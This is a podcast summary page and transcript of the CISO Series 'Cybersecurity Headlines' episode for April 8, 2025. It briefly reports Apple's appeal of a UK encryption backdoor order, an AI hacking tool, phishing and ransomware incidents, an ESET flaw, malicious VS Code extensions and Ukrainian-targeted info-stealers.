Apple encryption appeal, Xanthorox AI tool, weaponizing CRM - Cybersecurity Headlines

Summary5 min read

Cyber Security Headlines – April 8, 2025 Hosted by CISO Series

1. Apple Appeals UK Encryption Backdoor Order

Timestamp: [00:06]

In the latest cybersecurity developments, Apple has officially appealed a UK government order mandating the creation of a backdoor in its advanced data protection features. This decision comes after the UK's Investigatory Powers Tribunal (IPT) refused the British government's request to keep the case details confidential, citing national security concerns.

Rich Stroffolino reported, “Apple filed an appeal on an order that would require it to create a backdoor in its advanced data protection feature as part of its cloud storage” (00:06). This legal battle underscores the ongoing tension between privacy advocates and governmental agencies seeking access to encrypted data for security purposes. The hearing for Apple's appeal took place last month in London without media access, highlighting the sensitive nature of the case.

2. Researchers Warn About Xanthorox AI-Driven Hacking Tool

Timestamp: [01:30]

The cybersecurity community is bracing for potential threats from a new AI-driven hacking tool named Xanthorox, as detailed by researchers at Slashnext. Unlike previous AI-based tools that relied on existing Large Language Models (LLMs) through jailbreaks or workarounds, Xanthorox operates on a self-contained architecture using dedicated servers and a custom LLM.

Rich Stroffolino elaborated, “Xanthorox uses five operational models to handle code generation, vulnerability exploitation, data analysis, and integrates voice and image processing, making it capable of both automated and interactive attacks” (01:30). This modular approach allows Xanthorox to execute complex and coordinated cyberattacks, posing a significant threat to information security systems worldwide.

3. Poisonseed Campaign Weaponizes CRM Systems

Timestamp: [03:00]

A new malicious campaign dubbed "Poisonseed" has been identified by Silent Push researchers, exploiting Customer Relationship Management (CRM) and bulk email systems to distribute phishing emails. These deceptive emails impersonate Coinbase, urging users with self-custodial wallets to transfer their crypto assets. The emails contain crypto seed phrases within the transfer instructions, granting attackers access to the victims' wallets.

Rich Stroffolino stated, “It's estimated that Coinbase users have lost roughly $46 million in crypto assets since mid-March” (03:00). The campaign leverages various providers, including HubSpot, Mailchimp, Mailgun, SendGrid, and Zoho, to disseminate the phishing emails at scale, significantly increasing the campaign's reach and potential impact.

4. Everest Ransomware Site Goes Offline

Timestamp: [04:20]

The darknet leak site associated with the Russian-speaking ransomware group Everest has gone offline as of April 7, following a defacement incident over the weekend. Before disappearing, the site displayed a message condemning criminal activities: “don't do crime, Crime is bad. Xoxo from Prague.”

Rich Stroffolino highlighted, “It's unclear if the site going dark came from activity by law enforcement, an exit scan by the Groof itself or another third party” (04:20). Everest was previously linked to the attack on the cannabis dispensary Stizzy in November, but recent developments suggest internal turmoil or external pressure may have led to its temporary shutdown.

5. Clop Ransomware Group Linked Data Breach at W.K. Kellogg

Timestamp: [05:15]

W.K. Kellogg has disclosed a security incident resulting from a breach by the Clop ransomware group. The breach exploited vulnerabilities in the managed file transfer utility Clio, which Kellogg used to transfer employee files to a human resources vendor. The unauthorized access, identified on February 27, 2025, compromised employee names and Social Security numbers.

Rich Stroffolino reported, “W.K. Kellogg will offer impacted employees the now obligatory one year of credit monitoring services” (05:15). The company traced the breach back to unauthorized access via Clio on December 7, highlighting the persistent risks associated with third-party software vulnerabilities.

6. ESSET Antivirus Flaw Potentially Exploited by State-Backed Actors

Timestamp: [06:30]

Cybersecurity firm Esset identified and patched a critical flaw in its antivirus scanner software that could allow threat actors to bypass system defenses by planting a malicious DLL. This vulnerability was initially reported by Kaspersky researchers, who suggested that the state-backed threat group Toddycat might have exploited it using a modified version of EDR Sandblast.

Rich Stroffolino noted, “ESSET patched the issue and maintains it didn't find any evidence of it being exploited in the wild” (06:30). However, the potential for exploitation remains a concern, especially given that the attack would require administrative privileges, adding another layer of complexity for potential attackers.

7. Crypto Miners Posing as VS Code Extensions

Timestamp: [07:10]

Yuval Ronin, a researcher at Extension Total, uncovered nine malicious extensions on Microsoft's VS Code Marketplace designed to install crypto miners on users' systems. These extensions masquerade as tools for popular services like Discord, Roblox, Claude AI, and ChatGPT, or as compilers for various programming languages.

Rich Stroffolino explained, “These malicious extensions pose as tools for popular services... have been installed 300,000 times, although this likely has been used to make them appear more legitimate” (07:10). Despite reporting the malicious extensions to Microsoft, they remained available on the marketplace at the time of the podcast recording, highlighting challenges in swiftly addressing such threats.

8. Threat Actors Posing as Ukrainian Drone Companies

Timestamp: [08:45]

Ukraine's Computer Emergency Response Team, Cert UA, has been tracking a sophisticated campaign where threat actors impersonate drone manufacturers and state agencies to deploy info-stealing malware. The campaign begins with phishing emails containing malicious attachments, often using compromised accounts and subject lines relevant to drone operations, such as “Mine Discovery.”

Rich Stroffolino detailed, “Once infected, the campaign uses gifted crook malware to steal browser data and exfiltrate it to Telegram” (08:45). This campaign, designated UAC0226, underscores the evolving tactics of threat actors in leveraging industry-specific impersonation to gain unauthorized access and extract sensitive information.

Conclusion

The April 8, 2025 episode of Cyber Security Headlines by the CISO Series underscores the dynamic and multifaceted nature of today's cybersecurity landscape. From legal battles over encryption and the emergence of AI-driven hacking tools to sophisticated phishing campaigns and ransomware activities, the episode provides a comprehensive overview of the current threats and challenges facing information security professionals.

Rich Stroffolino emphasizes the relentless evolution of cyber threats, particularly with the integration of AI technologies, stating, “Most of our tools are getting an AI upgrade whether we like it or not” (09:50). This progression necessitates heightened vigilance and innovative security measures to protect against increasingly complex and automated attacks.

For more detailed stories and in-depth analysis, listeners are encouraged to visit CISOSeries.com.

Reporting for the CISO Series, I'm Rich Stroffolino reminding you to have a super sparkly day.

Loading summary

Transcript3 lines

[00:00]
A
From the CISO series, it's Cybersecurity Headlines.
[00:07]
B
These are the cybersecurity headlines for Tuesday, April 8, 2025. I'm Rich Stroffolino. Apple appeals UK encryption backdoor order the UK's Investigatory Powers Tribunal, or IPT, confirmed Apple filed an appeal on an order that would require it to create a backdoor in its advanced data protection feature as part of its cloud storage. We know this because the IPT refused an application by the British government to keep to the bare details of the case, including the identity of any filing parties under the argument that could damage national security. The Financial Times reported that Apple appealed the order, but now we have official confirmation. A hearing on the appeal was already held last month in London, but no media access was permitted. Researchers warn about AI driven hacking tool Researchers at Slashnext published details about Xanthorox AI, a modular AI driven hacking tool first spotted on hacker forums last month. Xanthorox uses five operational models to handle code generation, vulnerability exploitation, data analysis, and integrates voice and image processing, making it capable of both automated and interactive attacks. Previous AI based tools we've covered, like Wormgpt, used jailbroken or workarounds to run on existing LLMs. But Xantharox runs on a self contained architecture on dedicated servers, with its operators claiming it runs a custom LLM. Poisonseed Campaign Weaponizes CRM systems Researchers at Silent Push found a new campaign that uses customer relationship management and bulk email systems to send out phishing emails with crypto seed phrases to potential victims. These emails claim to come from Coinbase urging users with self custodial wallets to transfer assets. The seed phrases are included in transfer instructions for setting up the new wallets, which would then grant threat actors access to them. It's estimated that Coinbase users have lost roughly $46 million in crypto assets since mid March. The campaign has used a variety of providers to spam people, including HubSpot, Mailchimp, Mailgun, SendGrid and Zoho. Everest ransomware site goes offline the darknet leak site for the Russian speaking ransomware group Everest went offline on April 7 after being defaced over the weekend. Before going dark, the site was changed to read don't do crime, Crime is bad. Xoxo from Prague it's unclear if the site going dark came from activity by law enforcement, an exit scan by the Groof itself or another third party. Everest was previously linked to an attack on the cannabis dispensary Stizzy back in November. Ironically, it's now Everest that appears to have gone up in smoke. And now, thanks to today's episode sponsor Nudge Security who's using AI tools in your org? Find out today with Nudge Security. Nudge Security discovers every Genai tool ever used in your org, even those you've never heard of. For each tool, you'll see who introduced it, who else is using it, where it's integrated into other tools, how and a vendor security profile. Visit nudgesecurity.com AI to get your free Genai inventory today. That's n u d G-E-S-E-C-U-R-I-T-Y.com AI wk Kellogg feeling soggy after Clop linked data breach in late 2024, the Clop ransomware group targeted vulnerabilities in the managed file transfer utility Clio. We covered it extensively on this show. In a notice with Maine's Attorney General, the food giant W.K. kellogg said it learned of a potential security incident due to the Clio breach on February 27, 2025, ultimately tracing it back to unauthorized access. On December 7, the company used Clio for transferring employee files to a human resources vendor and the breach exposed employee names and Social Security numbers. W.K. kellogg will offer impacted employees the now obligatory one year of credit monitoring services. State backed actors could have exploited ESSET flaw the cybersecurity firm Esset confirmed a flaw reported by Kaspersky researchers that could be used by threat actors to plant a malicious DLL and execute it in Esset's antivirus scanner to bypass system defenses. ESSET patched the issue and maintains it didn't find any evidence of it being exploited in the wild. However, Kaspersky researchers claim that the suspected state backed threat group toddycat used a flaw in a campaign using a modified version of EDR Sandblast to load a malicious DLL under the name TCDSB to execute payloads. As it said, it hasn't seen the suspected DLLs to review them, but regardless, the approach would have required admin privileges to perform the attack. Crypto Miners pose as VS Code extensions extension Total researcher Yuval Ronin discovered nine extensions on Microsoft's VS Code Marketplace that attempt to fetch a PowerShell script from an external source to install a crypto miner. These malicious extensions pose as tools for popular services like discord, Roblox, Claude AI and ChatGPT, or as compilers for various programming languages. These extensions have been installed 300,000 times, although this likely has been used to make them appear more legitimate. Extension Total reported the extensions to Microsoft, but they are still on the marketplace as of this recording. Threat Actors posing as Ukrainian Drone Companies Ukraine's computer Emergency Response team, Cert ua, began tracking a campaign in February in which threat actors pose as drone manufacturers and state agencies to infect systems with info stealers. They approach victims with emails with malicious attachments, using compromised accounts under subject lines typical for drone operators, things like Mine Discovery. Once infected, the campaign uses gifted crook malware to steal browser data and exfiltrate it to Telegram. Cert UA didn't attribute the campaign to any previously known threat group tracking them under the designation UAC0226. Most of our tools are getting an AI upgrade whether we like it or not. Going AI is seen as a means to stay competitive. The increased productivity also requires increased scrutiny. Traditional security penetration testing efforts suddenly look very different when dealing with an LLM. That's one of the problems we'll be trying to address on our latest episode of the CISO series podcast. Look for with AI, don't think like a hacker, think like the whole of society. Wherever you get your podcasts or head on over to cisoseries.com reporting for the CISO series, I'm Rich Stroffolino reminding you to to have a super sparkly day.
[07:05]
A
Cybersecurity headlines are available every weekday. Head to cisoseries.com for the full stories behind the headlines.